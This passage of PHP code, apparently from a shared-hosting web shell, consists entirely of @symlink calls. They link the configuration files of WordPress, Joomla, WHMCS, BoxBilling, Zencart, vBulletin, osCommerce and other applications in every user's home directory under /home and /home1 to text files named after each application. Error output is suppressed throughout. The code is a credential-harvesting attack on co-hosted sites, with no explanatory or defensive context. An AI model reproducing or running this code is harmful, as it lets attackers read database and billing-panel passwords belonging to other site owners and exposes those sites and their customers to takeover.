- @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
- @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
- //Home1
- @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
- @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
- @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
- @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
